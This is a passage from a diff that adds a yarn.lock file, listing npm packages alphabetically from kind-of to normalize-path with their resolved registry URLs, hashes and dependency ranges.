+  version "3.2.2"
+  resolved "https://registry.yarnpkg.com/kind-of/-/kind-of-3.2.2.tgz#31ea21a734bab9bbb0f32466d893aea51e4a3c64"
+  dependencies:
+    is-buffer "^1.1.5"
+
+kind-of@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/kind-of/-/kind-of-4.0.0.tgz#20813df3d712928b207378691a45066fae72dd57"
+  dependencies:
+    is-buffer "^1.1.5"
+
+kind-of@^5.0.0:
+  version "5.1.0"
+  resolved "https://registry.yarnpkg.com/kind-of/-/kind-of-5.1.0.tgz#729c91e2d857b7a419a1f9aa65685c4c33f5845d"
+
+kind-of@^6.0.0, kind-of@^6.0.2:
+  version "6.0.2"
+  resolved "https://registry.yarnpkg.com/kind-of/-/kind-of-6.0.2.tgz#01146b36a6218e64e58f3a8d66de5d7fc6f6d051"
+
+koa-compose@^3.0.0, koa-compose@^3.2.1:
+  version "3.2.1"
+  resolved "https://registry.yarnpkg.com/koa-compose/-/koa-compose-3.2.1.tgz#a85ccb40b7d986d8e5a345b3a1ace8eabcf54de7"
+  dependencies:
+    any-promise "^1.1.0"
+
+koa-compose@^4.0.0:
+  version "4.1.0"
+  resolved "https://registry.yarnpkg.com/koa-compose/-/koa-compose-4.1.0.tgz#507306b9371901db41121c812e923d0d67d3e877"
+
+koa-connect@^2.0.1:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/koa-connect/-/koa-connect-2.0.1.tgz#2acad159c33862de1d73aa4562a48de13f137c0f"
+
+koa-convert@^1.2.0:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/koa-convert/-/koa-convert-1.2.0.tgz#da40875df49de0539098d1700b50820cebcd21d0"
+  dependencies:
+    co "^4.6.0"
+    koa-compose "^3.0.0"
+
+koa-is-json@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/koa-is-json/-/koa-is-json-1.0.0.tgz#273c07edcdcb8df6a2c1ab7d59ee76491451ec14"
+
+koa-mount@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/koa-mount/-/koa-mount-3.0.0.tgz#08cab3b83d31442ed8b7e75c54b1abeb922ec197"
+  dependencies:
+    debug "^2.6.1"
+    koa-compose "^3.2.1"
+
+koa-range@^0.3.0:
+  version "0.3.0"
+  resolved "https://registry.yarnpkg.com/koa-range/-/koa-range-0.3.0.tgz#3588e3496473a839a1bd264d2a42b1d85bd7feac"
+  dependencies:
+    stream-slice "^0.1.2"
+
+koa-send@^4.1.3:
+  version "4.1.3"
+  resolved "https://registry.yarnpkg.com/koa-send/-/koa-send-4.1.3.tgz#0822207bbf5253a414c8f1765ebc29fa41353cb6"
+  dependencies:
+    debug "^2.6.3"
+    http-errors "^1.6.1"
+    mz "^2.6.0"
+    resolve-path "^1.4.0"
+
+koa-static@^4.0.2:
+  version "4.0.3"
+  resolved "https://registry.yarnpkg.com/koa-static/-/koa-static-4.0.3.tgz#5f93ad00fb1905db9ce46667c0e8bb7d22abfcd8"
+  dependencies:
+    debug "^3.1.0"
+    koa-send "^4.1.3"
+
+koa-webpack@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/koa-webpack/-/koa-webpack-4.0.0.tgz#1d9b83c109db106d8ef65db376f910a45ba964c7"
+  dependencies:
+    app-root-path "^2.0.1"
+    merge-options "^1.0.0"
+    webpack-dev-middleware "^3.0.0"
+    webpack-hot-client "^3.0.0"
+    webpack-log "^1.1.1"
+
+koa@^2.4.1:
+  version "2.5.1"
+  resolved "https://registry.yarnpkg.com/koa/-/koa-2.5.1.tgz#79f8b95f8d72d04fe9a58a8da5ebd6d341103f9c"
+  dependencies:
+    accepts "^1.2.2"
+    content-disposition "~0.5.0"
+    content-type "^1.0.0"
+    cookies "~0.7.0"
+    debug "*"
+    delegates "^1.0.0"
+    depd "^1.1.0"
+    destroy "^1.0.3"
+    error-inject "~1.0.0"
+    escape-html "~1.0.1"
+    fresh "^0.5.2"
+    http-assert "^1.1.0"
+    http-errors "^1.2.8"
+    is-generator-function "^1.0.3"
+    koa-compose "^4.0.0"
+    koa-convert "^1.2.0"
+    koa-is-json "^1.0.0"
+    mime-types "^2.0.7"
+    on-finished "^2.1.0"
+    only "0.0.2"
+    parseurl "^1.3.0"
+    statuses "^1.2.0"
+    type-is "^1.5.5"
+    vary "^1.0.0"
+
+last-call-webpack-plugin@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/last-call-webpack-plugin/-/last-call-webpack-plugin-3.0.0.tgz#9742df0e10e3cf46e5c0381c2de90d3a7a2d7555"
+  dependencies:
+    lodash "^4.17.5"
+    webpack-sources "^1.1.0"
+
+latest-version@^3.0.0:
+  version "3.1.0"
+  resolved "https://registry.yarnpkg.com/latest-version/-/latest-version-3.1.0.tgz#a205383fea322b33b5ae3b18abee0dc2f356ee15"
+  dependencies:
+    package-json "^4.0.0"
+
+leb@^0.3.0:
+  version "0.3.0"
+  resolved "https://registry.yarnpkg.com/leb/-/leb-0.3.0.tgz#32bee9fad168328d6aea8522d833f4180eed1da3"
+
+linkify-it@^2.0.0:
+  version "2.0.3"
+  resolved "https://registry.yarnpkg.com/linkify-it/-/linkify-it-2.0.3.tgz#d94a4648f9b1c179d64fa97291268bdb6ce9434f"
+  dependencies:
+    uc.micro "^1.0.1"
+
+load-json-file@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/load-json-file/-/load-json-file-4.0.0.tgz#2f5f45ab91e33216234fd53adab668eb4ec0993b"
+  dependencies:
+    graceful-fs "^4.1.2"
+    parse-json "^4.0.0"
+    pify "^3.0.0"
+    strip-bom "^3.0.0"
+
+load-script@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/load-script/-/load-script-1.0.0.tgz#0491939e0bee5643ee494a7e3da3d2bac70c6ca4"
+
+loader-runner@^2.3.0:
+  version "2.3.0"
+  resolved "https://registry.yarnpkg.com/loader-runner/-/loader-runner-2.3.0.tgz#f482aea82d543e07921700d5a46ef26fdac6b8a2"
+
+loader-utils@^0.2.16:
+  version "0.2.17"
+  resolved "https://registry.yarnpkg.com/loader-utils/-/loader-utils-0.2.17.tgz#f86e6374d43205a6e6c60e9196f17c0299bfb348"
+  dependencies:
+    big.js "^3.1.3"
+    emojis-list "^2.0.0"
+    json5 "^0.5.0"
+    object-assign "^4.0.1"
+
+loader-utils@^1.0.2, loader-utils@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/loader-utils/-/loader-utils-1.1.0.tgz#c98aef488bcceda2ffb5e2de646d6a754429f5cd"
+  dependencies:
+    big.js "^3.1.3"
+    emojis-list "^2.0.0"
+    json5 "^0.5.0"
+
+locate-path@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/locate-path/-/locate-path-2.0.0.tgz#2b568b265eec944c6d9c0de9c3dbbbca0354cd8e"
+  dependencies:
+    p-locate "^2.0.0"
+    path-exists "^3.0.0"
+
+lodash._reinterpolate@~3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/lodash._reinterpolate/-/lodash._reinterpolate-3.0.0.tgz#0ccf2d89166af03b3663c796538b75ac6e114d9d"
+
+lodash.assign@~4.2.0:
+  version "4.2.0"
+  resolved "https://registry.yarnpkg.com/lodash.assign/-/lodash.assign-4.2.0.tgz#0d99f3ccd7a6d261d19bdaeb9245005d285808e7"
+
+lodash.camelcase@^4.3.0:
+  version "4.3.0"
+  resolved "https://registry.yarnpkg.com/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz#b28aa6288a2b9fc651035c7711f65ab6190331a6"
+
+lodash.clonedeep@^4.5.0:
+  version "4.5.0"
+  resolved "https://registry.yarnpkg.com/lodash.clonedeep/-/lodash.clonedeep-4.5.0.tgz#e23f3f9c4f8fbdde872529c1071857a086e5ccef"
+
+lodash.debounce@^4.0.8:
+  version "4.0.8"
+  resolved "https://registry.yarnpkg.com/lodash.debounce/-/lodash.debounce-4.0.8.tgz#82d79bff30a67c4005ffd5e2515300ad9ca4d7af"
+
+lodash.memoize@^4.1.2:
+  version "4.1.2"
+  resolved "https://registry.yarnpkg.com/lodash.memoize/-/lodash.memoize-4.1.2.tgz#bcc6c49a42a2840ed997f323eada5ecd182e0bfe"
+
+lodash.template@^4.4.0:
+  version "4.4.0"
+  resolved "https://registry.yarnpkg.com/lodash.template/-/lodash.template-4.4.0.tgz#e73a0385c8355591746e020b99679c690e68fba0"
+  dependencies:
+    lodash._reinterpolate "~3.0.0"
+    lodash.templatesettings "^4.0.0"
+
+lodash.templatesettings@^4.0.0:
+  version "4.1.0"
+  resolved "https://registry.yarnpkg.com/lodash.templatesettings/-/lodash.templatesettings-4.1.0.tgz#2b4d4e95ba440d915ff08bc899e4553666713316"
+  dependencies:
+    lodash._reinterpolate "~3.0.0"
+
+lodash.throttle@^4.1.1:
+  version "4.1.1"
+  resolved "https://registry.yarnpkg.com/lodash.throttle/-/lodash.throttle-4.1.1.tgz#c23e91b710242ac70c37f1e1cda9274cc39bf2f4"
+
+lodash.uniq@^4.5.0:
+  version "4.5.0"
+  resolved "https://registry.yarnpkg.com/lodash.uniq/-/lodash.uniq-4.5.0.tgz#d0225373aeb652adc1bc82e4945339a842754773"
+
+lodash@^4.17.3, lodash@^4.17.4, lodash@^4.17.5:
+  version "4.17.10"
+  resolved "https://registry.yarnpkg.com/lodash/-/lodash-4.17.10.tgz#1b7793cf7259ea38fb3661d4d38b3260af8ae4e7"
+
+log-symbols@^2.1.0:
+  version "2.2.0"
+  resolved "https://registry.yarnpkg.com/log-symbols/-/log-symbols-2.2.0.tgz#5740e1c5d6f0dfda4ad9323b5332107ef6b4c40a"
+  dependencies:
+    chalk "^2.0.1"
+
+log-update@^2.3.0:
+  version "2.3.0"
+  resolved "https://registry.yarnpkg.com/log-update/-/log-update-2.3.0.tgz#88328fd7d1ce7938b29283746f0b1bc126b24708"
+  dependencies:
+    ansi-escapes "^3.0.0"
+    cli-cursor "^2.0.0"
+    wrap-ansi "^3.0.1"
+
+loglevelnext@^1.0.1, loglevelnext@^1.0.2:
+  version "1.0.5"
+  resolved "https://registry.yarnpkg.com/loglevelnext/-/loglevelnext-1.0.5.tgz#36fc4f5996d6640f539ff203ba819641680d75a2"
+  dependencies:
+    es6-symbol "^3.1.1"
+    object.assign "^4.1.0"
+
+long@^3.2.0:
+  version "3.2.0"
+  resolved "https://registry.yarnpkg.com/long/-/long-3.2.0.tgz#d821b7138ca1cb581c172990ef14db200b5c474b"
+
+loose-envify@^1.0.0:
+  version "1.3.1"
+  resolved "https://registry.yarnpkg.com/loose-envify/-/loose-envify-1.3.1.tgz#d1a8ad33fa9ce0e713d65fdd0ac8b748d478c848"
+  dependencies:
+    js-tokens "^3.0.0"
+
+loud-rejection@^1.0.0, loud-rejection@^1.6.0:
+  version "1.6.0"
+  resolved "https://registry.yarnpkg.com/loud-rejection/-/loud-rejection-1.6.0.tgz#5b46f80147edee578870f086d04821cf998e551f"
+  dependencies:
+    currently-unhandled "^0.4.1"
+    signal-exit "^3.0.0"
+
+lower-case@^1.1.1:
+  version "1.1.4"
+  resolved "https://registry.yarnpkg.com/lower-case/-/lower-case-1.1.4.tgz#9a2cabd1b9e8e0ae993a4bf7d5875c39c42e8eac"
+
+lowercase-keys@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/lowercase-keys/-/lowercase-keys-1.0.1.tgz#6f9e30b47084d971a7c820ff15a6c5167b74c26f"
+
+lru-cache@^4.0.1, lru-cache@^4.1.1, lru-cache@^4.1.2:
+  version "4.1.3"
+  resolved "https://registry.yarnpkg.com/lru-cache/-/lru-cache-4.1.3.tgz#a1175cf3496dfc8436c156c334b4955992bce69c"
+  dependencies:
+    pseudomap "^1.0.2"
+    yallist "^2.1.2"
+
+make-dir@^1.0.0:
+  version "1.3.0"
+  resolved "https://registry.yarnpkg.com/make-dir/-/make-dir-1.3.0.tgz#79c1033b80515bd6d24ec9933e860ca75ee27f0c"
+  dependencies:
+    pify "^3.0.0"
+
+mamacro@^0.0.3:
+  version "0.0.3"
+  resolved "https://registry.yarnpkg.com/mamacro/-/mamacro-0.0.3.tgz#ad2c9576197c9f1abf308d0787865bd975a3f3e4"
+
+map-cache@^0.2.2:
+  version "0.2.2"
+  resolved "https://registry.yarnpkg.com/map-cache/-/map-cache-0.2.2.tgz#c32abd0bd6525d9b051645bb4f26ac5dc98a0dbf"
+
+map-obj@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/map-obj/-/map-obj-1.0.1.tgz#d933ceb9205d82bdcf4886f6742bdc2b4dea146d"
+
+map-obj@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/map-obj/-/map-obj-2.0.0.tgz#a65cd29087a92598b8791257a523e021222ac1f9"
+
+map-visit@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/map-visit/-/map-visit-1.0.0.tgz#ecdca8f13144e660f1b5bd41f12f3479d98dfb8f"
+  dependencies:
+    object-visit "^1.0.0"
+
+markdown-it-anchor@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/markdown-it-anchor/-/markdown-it-anchor-4.0.0.tgz#e87fb5543e01965adf71506c6bf7b0491841b7e3"
+  dependencies:
+    string "^3.3.3"
+
+markdown-it-container@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/markdown-it-container/-/markdown-it-container-2.0.0.tgz#0019b43fd02eefece2f1960a2895fba81a404695"
+
+markdown-it-emoji@^1.4.0:
+  version "1.4.0"
+  resolved "https://registry.yarnpkg.com/markdown-it-emoji/-/markdown-it-emoji-1.4.0.tgz#9bee0e9a990a963ba96df6980c4fddb05dfb4dcc"
+
+markdown-it-table-of-contents@^0.3.3:
+  version "0.3.6"
+  resolved "https://registry.yarnpkg.com/markdown-it-table-of-contents/-/markdown-it-table-of-contents-0.3.6.tgz#2a733c52485cd47769365402681987ed7d9e64a9"
+  dependencies:
+    lodash.assign "~4.2.0"
+    string "~3.3.3"
+
+markdown-it@^8.4.1:
+  version "8.4.1"
+  resolved "https://registry.yarnpkg.com/markdown-it/-/markdown-it-8.4.1.tgz#206fe59b0e4e1b78a7c73250af9b34a4ad0aaf44"
+  dependencies:
+    argparse "^1.0.7"
+    entities "~1.1.1"
+    linkify-it "^2.0.0"
+    mdurl "^1.0.1"
+    uc.micro "^1.0.5"
+
+math-expression-evaluator@^1.2.14:
+  version "1.2.17"
+  resolved "https://registry.yarnpkg.com/math-expression-evaluator/-/math-expression-evaluator-1.2.17.tgz#de819fdbcd84dccd8fae59c6aeb79615b9d266ac"
+
+math-random@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/math-random/-/math-random-1.0.1.tgz#8b3aac588b8a66e4975e3cdea67f7bb329601fac"
+
+md5.js@^1.3.4:
+  version "1.3.4"
+  resolved "https://registry.yarnpkg.com/md5.js/-/md5.js-1.3.4.tgz#e9bdbde94a20a5ac18b04340fc5764d5b09d901d"
+  dependencies:
+    hash-base "^3.0.0"
+    inherits "^2.0.1"
+
+mdurl@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/mdurl/-/mdurl-1.0.1.tgz#fe85b2ec75a59037f2adfec100fd6c601761152e"
+
+media-typer@0.3.0:
+  version "0.3.0"
+  resolved "https://registry.yarnpkg.com/media-typer/-/media-typer-0.3.0.tgz#8710d7af0aa626f8fffa1ce00168545263255748"
+
+memory-fs@^0.4.0, memory-fs@~0.4.1:
+  version "0.4.1"
+  resolved "https://registry.yarnpkg.com/memory-fs/-/memory-fs-0.4.1.tgz#3a9a20b8462523e447cfbc7e8bb80ed667bfc552"
+  dependencies:
+    errno "^0.1.3"
+    readable-stream "^2.0.1"
+
+meow@^5.0.0:
+  version "5.0.0"
+  resolved "https://registry.yarnpkg.com/meow/-/meow-5.0.0.tgz#dfc73d63a9afc714a5e371760eb5c88b91078aa4"
+  dependencies:
+    camelcase-keys "^4.0.0"
+    decamelize-keys "^1.0.0"
+    loud-rejection "^1.0.0"
+    minimist-options "^3.0.1"
+    normalize-package-data "^2.3.4"
+    read-pkg-up "^3.0.0"
+    redent "^2.0.0"
+    trim-newlines "^2.0.0"
+    yargs-parser "^10.0.0"
+
+merge-options@^1.0.0, merge-options@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/merge-options/-/merge-options-1.0.1.tgz#2a64b24457becd4e4dc608283247e94ce589aa32"
+  dependencies:
+    is-plain-obj "^1.1"
+
+merge-source-map@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/merge-source-map/-/merge-source-map-1.1.0.tgz#2fdde7e6020939f70906a68f2d7ae685e4c8c646"
+  dependencies:
+    source-map "^0.6.1"
+
+merge2@^1.2.1:
+  version "1.2.2"
+  resolved "https://registry.yarnpkg.com/merge2/-/merge2-1.2.2.tgz#03212e3da8d86c4d8523cebd6318193414f94e34"
+
+micromatch@^2.3.11:
+  version "2.3.11"
+  resolved "https://registry.yarnpkg.com/micromatch/-/micromatch-2.3.11.tgz#86677c97d1720b363431d04d0d15293bd38c1565"
+  dependencies:
+    arr-diff "^2.0.0"
+    array-unique "^0.2.1"
+    braces "^1.8.2"
+    expand-brackets "^0.1.4"
+    extglob "^0.3.1"
+    filename-regex "^2.0.0"
+    is-extglob "^1.0.0"
+    is-glob "^2.0.1"
+    kind-of "^3.0.2"
+    normalize-path "^2.0.1"
+    object.omit "^2.0.0"
+    parse-glob "^3.0.4"
+    regex-cache "^0.4.2"
+
+micromatch@^3.1.10, micromatch@^3.1.4, micromatch@^3.1.8:
+  version "3.1.10"
+  resolved "https://registry.yarnpkg.com/micromatch/-/micromatch-3.1.10.tgz#70859bc95c9840952f359a068a3fc49f9ecfac23"
+  dependencies:
+    arr-diff "^4.0.0"
+    array-unique "^0.3.2"
+    braces "^2.3.1"
+    define-property "^2.0.2"
+    extend-shallow "^3.0.2"
+    extglob "^2.0.4"
+    fragment-cache "^0.2.1"
+    kind-of "^6.0.2"
+    nanomatch "^1.2.9"
+    object.pick "^1.3.0"
+    regex-not "^1.0.0"
+    snapdragon "^0.8.1"
+    to-regex "^3.0.2"
+
+miller-rabin@^4.0.0:
+  version "4.0.1"
+  resolved "https://registry.yarnpkg.com/miller-rabin/-/miller-rabin-4.0.1.tgz#f080351c865b0dc562a8462966daa53543c78a4d"
+  dependencies:
+    bn.js "^4.0.0"
+    brorand "^1.0.1"
+
+mime-db@~1.33.0:
+  version "1.33.0"
+  resolved "https://registry.yarnpkg.com/mime-db/-/mime-db-1.33.0.tgz#a3492050a5cb9b63450541e39d9788d2272783db"
+
+mime-types@^2.0.7, mime-types@~2.1.18:
+  version "2.1.18"
+  resolved "https://registry.yarnpkg.com/mime-types/-/mime-types-2.1.18.tgz#6f323f60a83d11146f831ff11fd66e2fe5503bb8"
+  dependencies:
+    mime-db "~1.33.0"
+
+mime@^2.0.3, mime@^2.1.0:
+  version "2.3.1"
+  resolved "https://registry.yarnpkg.com/mime/-/mime-2.3.1.tgz#b1621c54d63b97c47d3cfe7f7215f7d64517c369"
+
+mimic-fn@^1.0.0:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/mimic-fn/-/mimic-fn-1.2.0.tgz#820c86a39334640e99516928bd03fca88057d022"
+
+min-document@^2.19.0:
+  version "2.19.0"
+  resolved "https://registry.yarnpkg.com/min-document/-/min-document-2.19.0.tgz#7bd282e3f5842ed295bb748cdd9f1ffa2c824685"
+  dependencies:
+    dom-walk "^0.1.0"
+
+mini-css-extract-plugin@^0.4.0:
+  version "0.4.0"
+  resolved "https://registry.yarnpkg.com/mini-css-extract-plugin/-/mini-css-extract-plugin-0.4.0.tgz#ff3bf08bee96e618e177c16ca6131bfecef707f9"
+  dependencies:
+    loader-utils "^1.1.0"
+    webpack-sources "^1.1.0"
+
+minimalistic-assert@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/minimalistic-assert/-/minimalistic-assert-1.0.1.tgz#2e194de044626d4a10e7f7fbc00ce73e83e4d5c7"
+
+minimalistic-crypto-utils@^1.0.0, minimalistic-crypto-utils@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/minimalistic-crypto-utils/-/minimalistic-crypto-utils-1.0.1.tgz#f6c00c1c0b082246e5c4d99dfb8c7c083b2b582a"
+
+minimatch@^3.0.2, minimatch@^3.0.4:
+  version "3.0.4"
+  resolved "https://registry.yarnpkg.com/minimatch/-/minimatch-3.0.4.tgz#5166e286457f03306064be5497e8dbb0c3d32083"
+  dependencies:
+    brace-expansion "^1.1.7"
+
+minimist-options@^3.0.1:
+  version "3.0.2"
+  resolved "https://registry.yarnpkg.com/minimist-options/-/minimist-options-3.0.2.tgz#fba4c8191339e13ecf4d61beb03f070103f3d954"
+  dependencies:
+    arrify "^1.0.1"
+    is-plain-obj "^1.1.0"
+
+minimist@0.0.8:
+  version "0.0.8"
+  resolved "https://registry.yarnpkg.com/minimist/-/minimist-0.0.8.tgz#857fcabfc3397d2625b8228262e86aa7a011b05d"
+
+minimist@^1.2.0:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/minimist/-/minimist-1.2.0.tgz#a35008b20f41383eec1fb914f4cd5df79a264284"
+
+minipass@^2.2.1, minipass@^2.3.3:
+  version "2.3.3"
+  resolved "https://registry.yarnpkg.com/minipass/-/minipass-2.3.3.tgz#a7dcc8b7b833f5d368759cce544dccb55f50f233"
+  dependencies:
+    safe-buffer "^5.1.2"
+    yallist "^3.0.0"
+
+minizlib@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/minizlib/-/minizlib-1.1.0.tgz#11e13658ce46bc3a70a267aac58359d1e0c29ceb"
+  dependencies:
+    minipass "^2.2.1"
+
+mississippi@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/mississippi/-/mississippi-2.0.0.tgz#3442a508fafc28500486feea99409676e4ee5a6f"
+  dependencies:
+    concat-stream "^1.5.0"
+    duplexify "^3.4.2"
+    end-of-stream "^1.1.0"
+    flush-write-stream "^1.0.0"
+    from2 "^2.1.0"
+    parallel-transform "^1.1.0"
+    pump "^2.0.1"
+    pumpify "^1.3.3"
+    stream-each "^1.1.0"
+    through2 "^2.0.0"
+
+mixin-deep@^1.2.0:
+  version "1.3.1"
+  resolved "https://registry.yarnpkg.com/mixin-deep/-/mixin-deep-1.3.1.tgz#a49e7268dce1a0d9698e45326c5626df3543d0fe"
+  dependencies:
+    for-in "^1.0.2"
+    is-extendable "^1.0.1"
+
+mkdirp@0.3.0:
+  version "0.3.0"
+  resolved "https://registry.yarnpkg.com/mkdirp/-/mkdirp-0.3.0.tgz#1bbf5ab1ba827af23575143490426455f481fe1e"
+
+mkdirp@0.5.x, mkdirp@^0.5.0, mkdirp@^0.5.1, mkdirp@~0.5.0, mkdirp@~0.5.1:
+  version "0.5.1"
+  resolved "https://registry.yarnpkg.com/mkdirp/-/mkdirp-0.5.1.tgz#30057438eac6cf7f8c4767f38648d6697d75c903"
+  dependencies:
+    minimist "0.0.8"
+
+move-concurrently@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/move-concurrently/-/move-concurrently-1.0.1.tgz#be2c005fda32e0b29af1f05d7c4b33214c701f92"
+  dependencies:
+    aproba "^1.1.1"
+    copy-concurrently "^1.0.0"
+    fs-write-stream-atomic "^1.0.8"
+    mkdirp "^0.5.1"
+    rimraf "^2.5.4"
+    run-queue "^1.0.3"
+
+ms@2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/ms/-/ms-2.0.0.tgz#5608aeadfc00be6c2901df5f9861788de0d597c8"
+
+mz@^2.6.0:
+  version "2.7.0"
+  resolved "https://registry.yarnpkg.com/mz/-/mz-2.7.0.tgz#95008057a56cafadc2bc63dde7f9ff6955948e32"
+  dependencies:
+    any-promise "^1.0.0"
+    object-assign "^4.0.1"
+    thenify-all "^1.0.0"
+
+nan@^2.9.2:
+  version "2.10.0"
+  resolved "https://registry.yarnpkg.com/nan/-/nan-2.10.0.tgz#96d0cd610ebd58d4b4de9cc0c6828cda99c7548f"
+
+nanoassert@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/nanoassert/-/nanoassert-1.1.0.tgz#4f3152e09540fde28c76f44b19bbcd1d5a42478d"
+
+nanobus@^4.3.1:
+  version "4.3.3"
+  resolved "https://registry.yarnpkg.com/nanobus/-/nanobus-4.3.3.tgz#a9635d38c687853641e2646bb2be6510cf966233"
+  dependencies:
+    nanotiming "^7.2.0"
+    remove-array-items "^1.0.0"
+
+nanomatch@^1.2.9:
+  version "1.2.9"
+  resolved "https://registry.yarnpkg.com/nanomatch/-/nanomatch-1.2.9.tgz#879f7150cb2dab7a471259066c104eee6e0fa7c2"
+  dependencies:
+    arr-diff "^4.0.0"
+    array-unique "^0.3.2"
+    define-property "^2.0.2"
+    extend-shallow "^3.0.2"
+    fragment-cache "^0.2.1"
+    is-odd "^2.0.0"
+    is-windows "^1.0.2"
+    kind-of "^6.0.2"
+    object.pick "^1.3.0"
+    regex-not "^1.0.0"
+    snapdragon "^0.8.1"
+    to-regex "^3.0.1"
+
+nanoscheduler@^1.0.2:
+  version "1.0.3"
+  resolved "https://registry.yarnpkg.com/nanoscheduler/-/nanoscheduler-1.0.3.tgz#6ca027941bf3e04139ea4bab6227ea6ad803692f"
+  dependencies:
+    nanoassert "^1.1.0"
+
+nanoseconds@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/nanoseconds/-/nanoseconds-1.0.1.tgz#596efc62110766be1ede671fedd861f5562318d3"
+
+nanotiming@^7.2.0:
+  version "7.3.1"
+  resolved "https://registry.yarnpkg.com/nanotiming/-/nanotiming-7.3.1.tgz#dc5cf8d9d8ad401a4394d1a9b7a16714bccfefda"
+  dependencies:
+    nanoassert "^1.1.0"
+    nanoscheduler "^1.0.2"
+
+needle@^2.2.0:
+  version "2.2.1"
+  resolved "https://registry.yarnpkg.com/needle/-/needle-2.2.1.tgz#b5e325bd3aae8c2678902fa296f729455d1d3a7d"
+  dependencies:
+    debug "^2.1.2"
+    iconv-lite "^0.4.4"
+    sax "^1.2.4"
+
+negotiator@0.6.1:
+  version "0.6.1"
+  resolved "https://registry.yarnpkg.com/negotiator/-/negotiator-0.6.1.tgz#2b327184e8992101177b28563fb5e7102acd0ca9"
+
+neo-async@^2.5.0:
+  version "2.5.1"
+  resolved "https://registry.yarnpkg.com/neo-async/-/neo-async-2.5.1.tgz#acb909e327b1e87ec9ef15f41b8a269512ad41ee"
+
+next-tick@1:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/next-tick/-/next-tick-1.0.0.tgz#ca86d1fe8828169b0120208e3dc8424b9db8342c"
+
+nice-try@^1.0.4:
+  version "1.0.4"
+  resolved "https://registry.yarnpkg.com/nice-try/-/nice-try-1.0.4.tgz#d93962f6c52f2c1558c0fbda6d512819f1efe1c4"
+
+no-case@^2.2.0:
+  version "2.3.2"
+  resolved "https://registry.yarnpkg.com/no-case/-/no-case-2.3.2.tgz#60b813396be39b3f1288a4c1ed5d1e7d28b464ac"
+  dependencies:
+    lower-case "^1.1.1"
+
+node-libs-browser@^2.0.0:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/node-libs-browser/-/node-libs-browser-2.1.0.tgz#5f94263d404f6e44767d726901fff05478d600df"
+  dependencies:
+    assert "^1.1.1"
+    browserify-zlib "^0.2.0"
+    buffer "^4.3.0"
+    console-browserify "^1.1.0"
+    constants-browserify "^1.0.0"
+    crypto-browserify "^3.11.0"
+    domain-browser "^1.1.1"
+    events "^1.0.0"
+    https-browserify "^1.0.0"
+    os-browserify "^0.3.0"
+    path-browserify "0.0.0"
+    process "^0.11.10"
+    punycode "^1.2.4"
+    querystring-es3 "^0.2.0"
+    readable-stream "^2.3.3"
+    stream-browserify "^2.0.1"
+    stream-http "^2.7.2"
+    string_decoder "^1.0.0"
+    timers-browserify "^2.0.4"
+    tty-browserify "0.0.0"
+    url "^0.11.0"
+    util "^0.10.3"
+    vm-browserify "0.0.4"
+
+node-pre-gyp@^0.10.0:
+  version "0.10.0"
+  resolved "https://registry.yarnpkg.com/node-pre-gyp/-/node-pre-gyp-0.10.0.tgz#6e4ef5bb5c5203c6552448828c852c40111aac46"
+  dependencies:
+    detect-libc "^1.0.2"
+    mkdirp "^0.5.1"
+    needle "^2.2.0"
+    nopt "^4.0.1"
+    npm-packlist "^1.1.6"
+    npmlog "^4.0.2"
+    rc "^1.1.7"
+    rimraf "^2.6.1"
+    semver "^5.3.0"
+    tar "^4"
+
+nopt@1.0.10:
+  version "1.0.10"
+  resolved "https://registry.yarnpkg.com/nopt/-/nopt-1.0.10.tgz#6ddd21bd2a31417b92727dd585f8a6f37608ebee"
+  dependencies:
+    abbrev "1"
+
+nopt@^4.0.1:
+  version "4.0.1"
+  resolved "https://registry.yarnpkg.com/nopt/-/nopt-4.0.1.tgz#d0d4685afd5415193c8c7505602d0d17cd64474d"
+  dependencies:
+    abbrev "1"
+    osenv "^0.1.4"
+
+normalize-package-data@^2.3.2, normalize-package-data@^2.3.4:
+  version "2.4.0"
+  resolved "https://registry.yarnpkg.com/normalize-package-data/-/normalize-package-data-2.4.0.tgz#12f95a307d58352075a04907b84ac8be98ac012f"
+  dependencies:
+    hosted-git-info "^2.1.4"
+    is-builtin-module "^1.0.0"
+    semver "2 || 3 || 4 || 5"
+    validate-npm-package-license "^3.0.1"
+
+normalize-path@^2.0.1, normalize-path@^2.1.1:
+  version "2.1.1"
